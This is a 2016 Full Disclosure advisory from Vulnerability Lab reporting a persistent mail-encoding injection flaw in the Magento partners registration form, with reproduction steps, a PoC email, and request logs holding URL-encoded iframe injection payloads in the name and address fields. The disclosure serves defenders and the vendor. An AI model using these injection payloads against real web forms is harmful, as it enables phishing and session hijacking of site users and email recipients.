[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Ebay Magento Bug Bounty #2 - Persistent Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-01-27 14:22:50
Message-ID: 56A8D2BA.9050806 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Ebay Magento Bug Bounty #2 - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1203
eBay Inc. Bug Bounty Program ID: EIBBP-26644
Release Date:
=============
2016-01-18
Vulnerability Laboratory ID (VL-ID):
====================================
1203
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under \
the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from \
the programmers within the open source community but is now owned solely by eBay Inc. Magento \
was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database \
model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all \
websites.
Our team of security professionals works hard to keep Magento customer information secure. \
What`s equally important to protecting this data? Our security researchers and user community. \
If you find a site that isn`t following our policies, or a vulnerability inside our system, \
please tell us right away.
( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web \
vulnerability in the official eBay Magento `partners` Web-Application.
Vulnerability Disclosure Timeline:
==================================
2016-01-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Ebay Inc.
Product: Magento - Partners Web Application 2014 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official magento \
partners web-application. The vulnerability allows remote attackers to bypass the outgoing mail \
filter validation of the magento web-server.
The persistent vulnerability is located in the `/register_new_industry.aspx` file of the \
partners.magento.com/English/ website web-application. The context validation vulnerability \
itself is located in the firstname and lastname values. Remote attackers are able to inject \
the payload as firstname and lastname. The remote vulnerability can be exploited by remote \
attackers or with automatic post scripts to send customers, clients and other random people \
malicious mails with injected script codes. The attack vector is persistent and the injection \
request method is POST. The security risk of the vulnerability is estimated as medium but \
affects the full partner web-server. The validation on the same server does not encode the \
outgoing values which results in the wrong encoded outgoing mails through the web forumlar.
Exploitation of the web vulnerability requires no privileged web-application user account and \
low or medium user interaction because of the persistent attack vector. Successful \
exploitation of the vulnerability results in session hijacking, persistent phishing, \
persistent external redirect and manipulation of web header or mail context.
Vulnerable Domain(s):
[+] https://partners.magento.com
Vulnerable Path(s):
[+] ../English/
Vulnerable File(s):
[+] register_new_industry.aspx
Vulnerable Parameter(s):
[+] firstname
[+] lastname
Affected Sender(s):
[+] partners@partners.magento.com
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers without \
privileged web-application user account but with low or medium user interaction. For security \
demonstration or to reproduce the vulnerability follow the provided steps and information \
below.
Manually steps to reproduce ...
1. Open up the website of the magento premium partners program > \
https://partners.magento.com/English/ 2. As next step we open the website with the registration \
formular for premium and platinum customers of the industry > \
https://partners.magento.com/English/register_new_industry.aspx 2. Now we inject our payload as \
firstname and lastname values in the input form of the partners formular 3. Click the \
send/submit email button 4. You will get redirected to a \
https://partners.magento.com/English/register_thanks.aspx with an id of the users session 5. \
Open your mailbox and watch the mail with the regular validation 6. The injected script code of \
the partner formular post method request executes after the Dear [First- & Lastname] \
introduction
PoC: Magento Partners: Your Magento Industry Partner Program Application (eMail)
<head>
<title>Your Magento Industry Partner Program Application</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" \
class="header-part1"><tr><td><b>Betreff: </b> Your Magento Industry Partner Program \
Application</td></tr><tr><td><b>Von: </b>"Magento Business Development Team" \
<partners@partners.magento.com></td></tr><tr><td><b>Datum: </b>16.02.2014 \
14:21</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" \
class="header-part2"><tr><td><b>An: </b>"bkm@evolution-sec.com" \
<bkm@evolution-sec.com></td></tr></table><br> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 \
Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html \
xmlns="http://www.w3.org/1999/xhtml"> <head>
<meta http-equiv="Content-Type" content="text/html; " />
<title>Magento</title>
<style type="text/css">
a { color: #0068b7; text-decoration: none; }
</style>
</head>
<body bgcolor="#EDEBE4">
<table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#EDEBE4">
<tr>
<td>
<table align="center" width="660" border="0" cellpadding="0" cellspacing="0" \
bgcolor="#EDEBE4"> <tr>
<td>
<table width="100%" border="0" cellspacing="20" cellpadding="0">
<tr>
<td style="padding:20px;" bgcolor="#EDEBE4"><img \
src="http://partners.magento.com/images/emails/magento_logo-200x59.gif" width="200" height="59" \
border="0" alt="Magento"></td> </tr>
<tr>
<td bgcolor="#FFFFFF" style="padding: 20px; font: bold 22px Arial, Helvetica, sans-serif; \
color: #F57B20; line-height: 22px;">Your Magento Industry Partner Program Application</td> \
</tr> <tr>
<td bgcolor="#FFFFFF" style="padding: 20px; font: 12px Arial, Helvetica, sans-serif; color: \
#666666; line-height: 22px;"> <strong>Dear "><[PERSISTENT INJECTED SCRIPT CODE EXECUTION OCCURS \
HERE!]>%20<X>,</strong><br> <br>
Thank you for your interest in the Magento Industry Partner Program. The Magento business \
development team will evaluate your application and reply to you within a few business \
days.<br> <br>
In the meantime, please review the process for listing and <a \
href="http://www.magentocommerce.com/magento-connect/market_your_extension/">marketing your \
extension on Magento Connect</a>. We also encourage you to avail yourself of the resources \
available on Magento.com.<br> <br>
Magento has a tremendous ecosystem of merchants, system integrators and technology partners to \
help grow your business. We look forward to being able to contribute to your business \
success.<br> <br>
Best Regards,<br>
The Magento Business Development Team
</td>
</tr>
<tr>
<td style="padding: 20px; font: 12px Arial, Helvetica, sans-serif; color: #666666; line-height: \
22px;"> <table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="font: 8px Arial, Helvetica, sans-serif; color: #666666; line-height: \
22px;"><img src="http://partners.magento.com/images/emails/magento_logo-200x59.gif" \
width="200" height="59" border="0" alt="Magento"><br /><br /></td> </tr>
<tr>
<td align="center" style="font: 8px Arial, Helvetica, sans-serif; color: #666666; line-height: \
22px;">Copyright © 2014 Magento, Inc. All rights reserved.</td> </tr>
<tr>
<td align="center" style="font: 10px Arial, Helvetica, sans-serif; color: #666666; line-height: \
22px;">10441 Jefferson Blvd. Suite 200 Culver City. CA 90232</td> </tr>
<tr>
<td align="center" style="font: 10px Arial, Helvetica, sans-serif; color: #666666; line-height: \
22px;"> <a href="http://www.magentocommerce.com/company/privacy" style="font-size: 10px; \
font-family: Arial, Helvetica, sans-serif;color: #0068b7; text-decoration: none;">Contact \
Us</a> | <a href="http://www.magentocommerce.com/company/privacy" \
style="font-size: 10px;
font-family: Arial, Helvetica, sans-serif;color: #0068b7; text-decoration: none;">Privacy \
Policy</a></td> </tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
</body>
</html>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST https://partners.magento.com/English/register_new_industry.aspx Load \
Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[146] Mime \
Type[text/html] Request Header:
Host[partners.magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://partners.magento.com/English/register_new_industry.aspx]
Cookie[optimizelySegments=%7B%22239237138%22%3A%22search%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; \
optimizelyEndUserId=oeu1392555308093r0.28514728302806724; optimizelyBuckets=%7B%7D; \
_ga=GA1.2.1553871972.1392555309; s_cc=true; s_fid=38F623EDADDDEA51-32134A2CDE4D98DA; \
gpv_pn=%2Fsecurity; undefined_s=First%20Visit; s_vnum=1393628400474%26vn%3D1; s_invisit=true; \
_tsm=m%3DSearch%2520Engine%253A%2520Organic%7Cs%3DGoogle%7Ck%3Dkeyword%2520unavailable%7Crp%3D%252Furl%7Crd%3Dgoogle.de; \
s_sq=%5B%5BB%5D%5D; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medi \
um%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A6%3A%22Direct%22%3Bs%3A7%3A%22keyword%22%3Bs \
%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1392555408%3B%7D; \
ASP.NET_SessionId=xdw2r4g502j5vgz1xtc5cg1n; BIGipServerHTTP_Pool=1711284746.20480.0000; \
__utma=233864223.1553871972.1392555309.1392556607.1392556607.1; \
__utmb=233864223.8.10.1392556607; __utmc=233864223; \
__utmz=233864223.1392556607.1.1.utmcsr=magentocommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/contact-us/thank_you]
Connection[keep-alive]
POST-Daten:
__EVENTTARGET[]
__EVENTARGUMENT[]
__VIEWSTATE[QuKHEi78Q5NXBcEbY1bmudR5hlqROZF3QyK03ydm08qBPTkmZQGq9d8Lon4G25myXyP5nbjtBs5qet \
5UoNP7EE%2FOOsDCuOlEi7r5pMf8RhDeU%2Fr%2Fdq0gXRkDNbXNvsC3%2BI3YECtEH5BwtmYPkbVM2kYjUKWAJit5LPuFgp \
Je%2FDrxOaNmOoEB%2BTKWOQgejuoPM6FHq0b3n4w08c4rYvb3mv7l9PGIunczvtmhayKScFi8%2BJYqK5%2FHSfhgTGH7mp \
coMsfAXDVUSlodU1wnDAypkZ8ISp1e26w4KMoVgrrBAisMr0kBZXIdbly%2Bh8RdQxF39IIP4%2B2VHPp%2BUX4gETXVZDdh5nk%3D]
__VIEWSTATEENCRYPTED[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24FirstName[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24LastName[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Company[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24TitleBox[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Phone[0234234234]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Website[http%3A%2F%2Fwww.evolution-sec.com]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Fax[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Address1[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Address2[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24City[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Zip[34128]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Country[Germany]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24State[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Canada[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Province[%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2506[293727]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2626[307370]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2507[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2508[293736]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2509[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2510[]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2513[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2514[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2517[293856]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2518[293865]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2519[293867]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2520[293871]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2521[293877]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2522[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2523[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24Question_2524[ \
%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E++++%22%3E%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24ctl50.x[112]
ctl00%24ctl00%24ctl00%24GlobalBodyContent%24ExternalBodyContent%24BodyContent%24ctl50.y[6]
Response Header:
Cache-Control[private]
Content-Type[text/html; charset=utf-8]
Location[/English/register_thanks.aspx]
Server[Microsoft-IIS/7.5]
X-AspNet-Version[4.0.30319]
X-UA-Compatible[IE=Edge]
Date[Sun, 16 Feb 2014 13:22:19 GMT]
Content-Length[146]
14:22:13.392[237ms][total 507ms] Status: 200[OK]
GET https://partners.magento.com/English/register_thanks.aspx Load Flags[LOAD_DOCUMENT_URI \
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9280] Mime Type[text/html] \
Request Header: Host[partners.magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://partners.magento.com/English/register_new_industry.aspx]
Cookie[optimizelySegments=%7B%22239237138%22%3A%22search%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; \
optimizelyEndUserId=oeu1392555308093r0.28514728302806724; optimizelyBuckets=%7B%7D; \
_ga=GA1.2.1553871972.1392555309; s_cc=true; s_fid=38F623EDADDDEA51-32134A2CDE4D98DA; \
gpv_pn=%2Fsecurity; undefined_s=First%20Visit; s_vnum=1393628400474%26vn%3D1; s_invisit=true; \
_tsm=m%3DSearch%2520Engine%253A%2520Organic%7Cs%3DGoogle%7Ck%3Dkeyword%2520unavailable%7Crp%3D%252Furl%7Crd%3Dgoogle.de; \
s_sq=%5B%5BB%5D%5D; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medi \
um%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A6%3A%22Direct%22%3Bs%3A7%3A%22keyword%22%3Bs \
%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1392555408%3B%7D; \
ASP.NET_SessionId=xdw2r4g502j5vgz1xtc5cg1n; BIGipServerHTTP_Pool=1711284746.20480.0000; \
__utma=233864223.1553871972.1392555309.1392556607.1392556607.1; \
__utmb=233864223.8.10.1392556607; __utmc=233864223; \
__utmz=233864223.1392556607.1.1.utmcsr=magentocommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/contact-us/thank_you]
Connection[keep-alive]
Response Header:
Cache-Control[private]
Content-Type[text/html; charset=utf-8]
Server[Microsoft-IIS/7.5]
X-AspNet-Version[4.0.30319]
X-UA-Compatible[IE=Edge]
Date[Sun, 16 Feb 2014 13:22:19 GMT]
Content-Length[9280]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Connection[Keep-Alive]
Reference(s):
https://partners.magento.com/
https://partners.magento.com/English/
https://partners.magento.com/English/register_new_industry.aspx
https://partners.magento.com/English/register_thanks.aspx
Picture(s):
../1.png
../2.png
../3.png
../4.png
Resource(s):
../Magento Partner Program_input.htm
../Your Magento Industry Partner Program Application.html
../Your Magento Industry Partner Program Application.eml
../poc-session-logs.txt
../poc.txt
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the vulnerable first- & lastname values \
in the contact-sales files. Setup a web-server restriction, parse and encode all outgoing \
database user, url and name values to prevent further persistent mail encoding issues.
Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability and the web-server \
validation misconfiguration are estimated as medium. (CVSS 3.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic